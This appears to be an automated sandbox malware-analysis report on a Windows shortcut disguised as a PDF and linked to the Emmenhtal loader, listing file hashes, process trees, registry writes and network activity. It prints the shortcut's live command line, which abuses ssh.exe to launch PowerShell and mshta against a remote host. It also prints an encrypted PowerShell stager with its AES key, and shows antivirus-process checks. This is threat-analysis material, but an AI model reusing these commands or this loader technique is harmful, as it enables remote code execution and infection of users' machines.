| File name: | Instruction_695-18014-012_Rev.pdf.lnk |
| Full analysis: | https://app.any.run/tasks/3c43dfe0-1419-4cf0-a4cd-01437d930cf8 |
| Verdict: | Malicious activity |
| Threats: | First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments. |
| Analysis date: | December 31, 2024, 10:43:19 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\" |
| MD5: | C5997A14E872D97D48E1D4EA8B66910F |
| SHA1: | E5BC26705B9DF5EADFC65FF0BB600743B4D2894D |
| SHA256: | 1E31450855498AA18F97E2BD1B77AA3CF652B88271502CA7EE926938C04B722F |
| SSDEEP: | 24:8N8PZsx/Tfff//YK/Urrt1v+/+GaWbUkT+1Z8lOxk86+vddS9dbEQWhWUIeFIU:87TXvYKKLGaaUkIigdo9aQv5W |
| .lnk | | | Windows Shortcut (100) |
|---|
| Flags: | IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon |
|---|---|
| FileAttributes: | (none) |
| TargetFileSize: | - |
| IconIndex: | 11 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | ssh.exe |
| Description: | Adobe PDF Document |
| RelativePath: | ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe |
| CommandLineArguments: | -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" . |
| IconFileName: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 372 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1356 | "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" | C:\Windows\System32\cmd.exe | — | 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1556 | find /I "avastui.exe" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2380 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function TrjYX($flSrW){return -split ($flSrW -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$YADH = TrjYX('DFD2C4EE694F45A0F3E44D0ADB7C270ED749DC7EF6401593F912CAEC63EF494D2EA2B3EF9F686623457F9914D620D611022B18BA0AA0DA1EFDE2E837FE39A91A30FB5E6573FA055C3E7BA28124949B3ED6932A18174825D67854EE52ACF723B81E60324C0D6BB98AEF1EB1A543C9D999234298B091465420D7E678C70EEA52EF2891813AEA77837E607B9AA4B9CA48902BA47B052AA796DC7DCC46E8CDCC1F3A0B6AE1982FCB5E9AADD4AC06A8B3EC58D236BF15F88EEC99296360D8DAAB39C76009D1B53A6A6592628D3B91A2FF8CD9E6CF4C6AA6B2B1AC1A4EC30CD890FBEFE013363935E75223B5891C72DC9720C7BFFB82DE0A2A658523FF0596554EE6B93D170C95D2C73D668B79AB3805EB0C1B2F2102F50F2172BCEED6511D84BC60904371B726620DDDECAF47BF8570631C1AC8BE6433308ED4EE47D2C8397190F4FB64D5070B3A6AA137EBC1791C26E64B6D88F1D398624C247A78D00DD99D453EBDCD7775DFEF76F3527D277D0716C411D35DFDC7A351AC61FA6A59C2CC2EE95CB64D6A5FD8310B84717A79FE639D0620EDA3617A9C3E209B953A29D65B23064B065EF698B96AED9A06DFE7BF9F199B165934F240DDB7163876E610FB1EB324F418489D5087729CF835E9C268808745D2F62C3CAEF82CB852A2FBAA610EAD441BA7387BF47ED42B7FEF4FC88AC2E68A1539CBD71191BAA99109E86F924FFBA11D3570610E1CDD1E98AA7A122A57CC1C82C4AA02341B8A52AD5A3B37F2056FA02B5656D6CA0C1F63337300C00187629B6F5500ABDAA224CFA4A19D1CF101651AA1240E5D02349C2E8C811B4A7DE2821AA988DB7405BBD69F3484AE7B4418B65DA204E4D93203333531935F9495CD0FEA855CC922B884963170630432E080916425C235D7EDCBBB89AFE7E0679403EBED09331390CCFDA2B8F68FB071A02E856888D5F28FD240D5C4B564ECF068306D252C5C07D3BFD66AB9C0FD617192399F19554EDA678EBF8B3A9618968D66FED847212DF14E048C7DC678206736A9F16FB976CF6EBEF6C365532E463F8024E388CBE1D7A8E22AE8798996E88B1A1F1B56FCE98B74083AE8618E642AAE11A1643C4476C2CD301CC9971A5C0629C96473C4B545A18A9CFEF1E062F749F187FF75E92ED1EF9924F0DF262050D9024217B6CE78522A5E4DFBCB500C084B8057C0BA4563577EA61A826040529EFA152845A1CA56A281F4A0CFE86ABFF8F9C3213DD7E557B6C7C519F5557A477495FF52EB8A620284845B044D616AD32C1D804B12308000548C0B515E113702A7F32421C530046120779FC30935D5344F608BD7DDAE9BAB35437E9D708086D3E939CFEFFDA611356DF6AA900E5C83D4FD620A3352EFA0044AF0B0D5D92E353F793F9A6C7EEA3BC852D11770B234DA2DA29512B0AE7A651C11CE4548CFD3573E888DEB73BD39094A2AE13481BD53909F3B93944EBAC62ADA321FFBBD8298D9A07C5EA9735CF3ADBFA8FE008819904F8D8B48DD74C81686CF41B7D7B76D406866F33B693440B8B12ED039488C6A0140262F8CE24530428F56663B272F3B2E239248933013CD87DBF5190B96DAADA854731F97D3F7F828B104BEA2CBD41966E042F1E2F654282459D2940BB8F3554DAC31B9E11E9A9ADB9563F8D1BC2AB39A67A1A98999D6F7866E9258AE29355B8F08B375460B2C30640E8BA0972C0F481476770BAFA7D3873B1E34052E7ADCEA081EEAD35C3D8FE00034B05C7C');$isCf=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((TrjYX('437556726455514B504167474D78786B')),[byte[]]::new(16)).TransformFinalBlock($YADH,0,$YADH.Length)); & $isCf.Substring(0,3) $isCf.Substring(129) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2788 | find /I "avgui.exe" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3208 | "C:\Users\admin\AppData\Local\Temp\6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe" /VERYSILENT | C:\Users\admin\AppData\Local\Temp\6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe | 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp | ||||||||||||
User: admin Company: ColorStream Integrity Level: MEDIUM Description: ColorStream Enhancement Library Exit code: 0 Version: 2.1.0.47 Modules
| |||||||||||||||
| 3560 | find /I "opssvc.exe" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3780 | tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | C:\Windows\System32\tasklist.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Lists the current running tasks Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3884 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4052 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6056) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (6056) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (6056) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (4640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (4640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (4640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (4640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (4640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (4640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (4640) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2380 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ilqsib1u.2dt.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6056 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8 | binary | |
MD5:971C514F84BBA0785F80AA1C23EDFD79 | SHA256:F157ED17FCAF8837FA82F8B69973848C9B10A02636848F995698212A08F31895 | |||
| 6924 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pwtyu4iu.by1.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6056 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12 | binary | |
MD5:67E486B2F148A3FCA863728242B6273E | SHA256:FACAF1C3A4BF232ABCE19A2D534E495B0D3ADC7DBE3797D336249AA6F70ADCFB | |||
| 6704 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ujmyujlt.twj.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6704 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s2lmk5uh.onj.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7104 | S5XF7PFF0L5EBLJADOTQX9.exe | C:\Users\admin\AppData\Local\Temp\{0CE73DEB-3A6A-4C05-B6A5-18059F853E5F}\.ba\CrashRpt.dll | executable | |
MD5:AB1A78EA3C767A7419E18D0A8113AB40 | SHA256:C04027BA0B872C906B9C910E27D7CE5AAB17C4D11F4B5330B32E9590723FF93D | |||
| 4640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bbz4ulhx.kjh.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_50nonihz.p44.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7104 | S5XF7PFF0L5EBLJADOTQX9.exe | C:\Users\admin\AppData\Local\Temp\{0CE73DEB-3A6A-4C05-B6A5-18059F853E5F}\.ba\Cockatoo.dll | executable | |
MD5:0FFB11D4AF21F736AB72DCA83095A161 | SHA256:40F6A2921E7BAF7FD78B2738A4F17D863C6F3ABCAE22692CA27055AC67EAD794 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.38.73.129:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
1688 | svchost.exe | GET | 200 | 23.32.238.112:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.32.238.112:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
6056 | mshta.exe | GET | 200 | 142.250.185.67:80 | http://c.pki.goog/r/gsr1.crl | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
1688 | svchost.exe | GET | 200 | 23.38.73.129:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6056 | mshta.exe | GET | 200 | 142.250.185.67:80 | http://c.pki.goog/r/r4.crl | unknown | — | — | whitelisted |
6376 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
— | — | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1688 | svchost.exe | 23.32.238.112:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.32.238.112:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5064 | SearchApp.exe | 2.19.80.27:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.38.73.129:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
1688 | svchost.exe | 23.38.73.129:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5064 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | unknown |
1176 | svchost.exe | 40.126.32.134:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
1176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
awakka-aws3.zoho-documents.com |
| unknown |
c.pki.goog |
| whitelisted |